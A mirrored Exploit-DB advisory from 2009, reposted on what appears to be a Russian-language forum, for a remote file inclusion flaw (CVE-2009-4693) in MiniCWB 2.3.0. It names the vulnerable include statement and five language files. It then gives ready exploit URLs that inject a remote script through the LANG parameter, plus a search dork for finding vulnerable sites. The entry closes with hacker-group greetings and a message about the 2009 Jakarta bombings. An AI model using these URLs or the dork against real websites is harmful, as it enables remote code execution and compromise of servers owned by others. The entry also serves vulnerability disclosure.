- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9204
- Проверка EDB
-
- Пройдено
- Автор
- NOGE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4693
- Дата публикации
- 2009-07-20
Код:
================================================================================================
[o] MiniCWB 2.3.0 Multiple Remote File Inclusion Vulnerability
Software : MiniCWB version 2.3.0
Vendor : http://www.grafxsoftware.com/
Download : http://www.grafxsoftware.com/login.php?action=form&url=download.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
================================================================================================
[o] Vulnerable file
include($LANG.".extra.php");
language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php
[o] Exploit
http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]
[o] Dork
"Powered by MiniCWB"
================================================================================================
[o] Greetz
MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
[o] Special
All victim Jakarta Explosion in JW Marriot and The Ritz-Carlton [ Friday July 17 2009 ]
fuck terorism!! you're not make us afraid but you make us more stronger.
================================================================================================
# milw0rm.com [2009-07-20]
- Источник
- www.exploit-db.com